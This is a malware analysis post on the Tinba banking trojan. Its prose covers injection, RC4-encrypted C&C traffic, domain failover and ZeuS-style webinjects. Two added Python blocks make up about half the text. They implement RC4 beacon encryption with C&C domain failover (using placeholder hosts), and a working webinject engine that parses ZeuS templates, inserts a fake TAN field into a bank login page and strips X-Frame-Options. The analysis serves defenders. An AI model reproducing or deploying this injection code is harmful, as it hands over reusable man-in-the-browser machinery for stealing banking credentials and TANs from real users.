CSIS Security Group A/S has uncovered a new trojan-banker family, which we have named Tinba (Tiny Banker), alias “Zusy”.
Tinba is a small data-stealing trojan-banker. It hooks into browsers, steals login data and sniffs network traffic. Like several other sophisticated trojan-bankers, it also uses Man-in-the-Browser (MiTB) tricks and webinjects to change the look and feel of certain webpages, with the purpose of circumventing two-factor authentication (2FA) or tricking the infected user into giving away additional sensitive data such as credit card details or TANs.
Tinba is the smallest trojan-banker we have ever encountered, and it belongs to a completely new family of malware which we expect to be battling in the coming months.
The code is approximately 20 KB in size (including config and webinjects) and is simple and clear, without any packing or advanced encryption. Antivirus detection of the analyzed samples is low.
Upon execution, Tinba uses an injection routine which is obfuscated primarily to avoid antivirus detection. It allocates new memory space in which this injection function is stored, and injects itself into a newly created “winver.exe” process (Version Reporter Applet) dropped into the Windows system folder. Tinba also injects itself into both the “explorer.exe” and “svchost.exe” processes.
Tinba primarily uses four libraries at runtime: ntdll.dll, advapi32.dll, ws2_32.dll and user32.dll. The main components are copied into %userprofile%\Application Data\Default as “bin.exe”, accompanied by the encrypted configuration file “cfg.dat” and the webinject file “web.dat”.
As observed in several other trojan-bankers and advanced malware, Tinba uses the RC4 encryption algorithm when communicating with its Command & Control (C&C) servers. Tinba has four hardcoded domains for its C&C communication, so that a single nonresponsive domain does not cut it off from its drones: if the first domain does not respond properly, Tinba simply moves on to the next domain down the chain. Updates are retrieved from the C&C server by sending it an encrypted string as a greeting (an “EHLO”). If the C&C server passes certain checks, the files mentioned above are downloaded and executed on the infected host. C&C communication is illustrated below.
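As an added example (not Tinba's own code, nor anything from CSIS), the following Python shows the two mechanisms just described: the RC4 routine used to protect C&C traffic and the configuration, and the walk down a hardcoded domain chain until one C&C answers. The key, the four domain names and the beacon format are constructed placeholders; the real values are not reproduced here. The `probe` callback stands in for the HTTP request so that the example runs offline.

```python
"""RC4 C&C encryption and hardcoded-domain failover (added example, not Tinba code)."""
from typing import Callable, List, Optional, Tuple

# Constructed placeholders: the real key and the four real domains are not reproduced.
CC_KEY = b"example-rc4-key"
CC_DOMAINS = ["cc1.example.invalid", "cc2.example.invalid",
              "cc3.example.invalid", "cc4.example.invalid"]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 key scheduling (KSA) followed by keystream generation (PRGA).

    RC4 is symmetric: the same call encrypts and decrypts. With the key
    hardcoded in the sample, captured traffic and cfg.dat can be decrypted
    with exactly this routine once the key has been pulled from the binary.
    """
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA, keystream XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_beacon(bot_uid: str, version: str) -> bytes:
    """Encrypt the initial greeting sent to the C&C (field layout is an assumption)."""
    return rc4(CC_KEY, f"uid={bot_uid}&ver={version}".encode())


def first_responding(domains: List[str],
                     probe: Callable[[str], Optional[bytes]]) -> Tuple[Optional[str], Optional[bytes]]:
    """Walk the domain chain in order and return the first domain that answers.

    `probe(domain)` returns the raw reply or None on failure; it is injected so
    that the example runs offline (a real client would issue the HTTP request here).
    """
    for domain in domains:
        reply = probe(domain)
        if reply is not None:
            return domain, reply
    return None, None


def simulated_probe(domain: str) -> Optional[bytes]:
    """Constructed stand-in: the first two domains are dead, the third replies."""
    if domain == CC_DOMAINS[2]:
        return rc4(CC_KEY, b"update=none")
    return None


if __name__ == "__main__":
    beacon = build_beacon("1a2b3c4d", "1.0")
    print("beacon:", beacon.hex())
    domain, reply = first_responding(CC_DOMAINS, simulated_probe)
    print("answered by", domain, "->", rc4(CC_KEY, reply).decode())
```

The practical point for an analyst is the symmetry: because the key is hardcoded, the same `rc4` call that the bot uses to encrypt its greeting decrypts a captured reply or the dropped configuration file, so recovering the key from the sample is enough to read the whole exchange.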
Tinba uses typical MiTB tricks and injects itself into legitimate browser processes such as iexplore.exe and firefox.exe. Once successfully injected, Tinba reads its settings from the configuration files (cfg.dat and web.dat) and intercepts and manipulates traffic through several browser APIs.
The webinject templates are identical to the ones used by ZeuS, but they can also use special values, e.g. %BOTUID%, which is replaced with the volume serial number.
An interesting observation is that Tinba modifies the X-Frame-Options header, which lets it inject insecure elements that are not served over HTTPS from external servers/websites. Like its equals, Tinba targets financial websites, but only a very small list of specific URLs.
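Added example, not code from Tinba, ZeuS or CSIS: a minimal parser for the ZeuS webinject template format referred to above (set_url / data_before / data_after / data_inject / data_end), the %BOTUID% substitution, and the rewrite of a matching response with its X-Frame-Options header dropped. The bank URL, the form markup, the injected TAN field and the bot ID are constructed; treating “modifies the X-Frame-Options header” as stripping it is an assumption made here.

```python
import fnmatch
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

@dataclass
class Inject:
    before: str = ""   # anchor text preceding the injection point
    after: str = ""    # anchor text ending the replaced region ("" = pure insert)
    payload: str = ""  # markup to inject; may contain %BOTUID%

@dataclass
class Rule:
    url_mask: str      # set_url mask; '*' is a wildcard
    flags: str         # ZeuS flags; G and P restrict the rule to GET/POST responses
    injects: List[Inject] = field(default_factory=list)

def parse_webinjects(text: str) -> List[Rule]:
    """Parse the set_url / data_before / data_after / data_inject / data_end format."""
    rules: List[Rule] = []
    current: Optional[Inject] = None
    section: Optional[str] = None
    buf: List[str] = []
    for line in text.splitlines():
        token = line.strip()
        if token.startswith("set_url"):
            parts = token.split()
            rules.append(Rule(parts[1], parts[2] if len(parts) > 2 else ""))
            current = None
        elif token in ("data_before", "data_after", "data_inject"):
            if not rules:
                raise ValueError("data block before any set_url")
            if token == "data_before" or current is None:  # data_before opens a new group
                current = Inject()
                rules[-1].injects.append(current)
            section, buf = token, []
        elif token == "data_end":
            body = "\n".join(buf)
            if section == "data_before":
                current.before = body
            elif section == "data_after":
                current.after = body
            elif section == "data_inject":
                current.payload = body
            section = None
        elif section is not None:
            buf.append(line)
    return rules

def apply_injects(rule: Rule, body: str, bot_uid: str) -> str:
    """Replace what lies between each before/after anchor pair with the payload."""
    for inj in rule.injects:
        payload = inj.payload.replace("%BOTUID%", bot_uid)  # Tinba: the volume serial number
        start = body.find(inj.before)
        if start < 0:
            continue  # anchor absent on this page: leave the page untouched
        start += len(inj.before)
        end = body.find(inj.after, start) if inj.after else start
        if end < 0:
            continue
        body = body[:start] + payload + body[end:]
    return body

def rewrite_response(url: str, method: str, headers: Dict[str, str], body: str,
                     rules: List[Rule], bot_uid: str) -> Tuple[Dict[str, str], str]:
    """Apply every matching rule to one response; on a match, drop X-Frame-Options."""
    matched = False
    for rule in rules:
        wanted = {c for c in rule.flags if c in "GP"}
        if wanted and method[:1].upper() not in wanted:
            continue
        if fnmatch.fnmatchcase(url, rule.url_mask):
            body = apply_injects(rule, body, bot_uid)
            matched = True
    if matched:  # stripping the header is our reading of "modifies X-Frame-Options"
        headers = {k: v for k, v in headers.items() if k.lower() != "x-frame-options"}
    return headers, body

# Constructed sample template and page; the bank URL, markup and bot ID are placeholders.
SAMPLE_WEBINJECTS = """\
set_url https://bank.example/login* GP
data_before
<input type="password" name="pin">
data_end
data_after
data_end
data_inject
<input type="text" name="tan" placeholder="Enter TAN"><!-- %BOTUID% -->
data_end
"""
SAMPLE_PAGE = ('<form action="/login"><input type="text" name="user">'
               '<input type="password" name="pin"></form>')
SAMPLE_HEADERS = {"Content-Type": "text/html", "X-Frame-Options": "DENY"}
```

Running `rewrite_response("https://bank.example/login?lang=en", "GET", SAMPLE_HEADERS, SAMPLE_PAGE, rules, "1a2b3c4d")` with `rules = parse_webinjects(SAMPLE_WEBINJECTS)` yields a page in which an extra TAN field follows the PIN field and the X-Frame-Options header is gone; a URL that does not match a set_url mask passes through unchanged. This is why the same ZeuS-format web.dat can be reused across families: the template carries the targeting, and the bot only has to supply the anchor matching, the %BOTUID% value and the header change.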
We have blocked access to all known Tinba C&C servers in CSIS Secure DNS, thus also protecting Heimdal Pro and Corporate users against data leakage.
Yes, Tinba proves that malware with data-stealing capabilities does not have to be 20 MB in size ;-)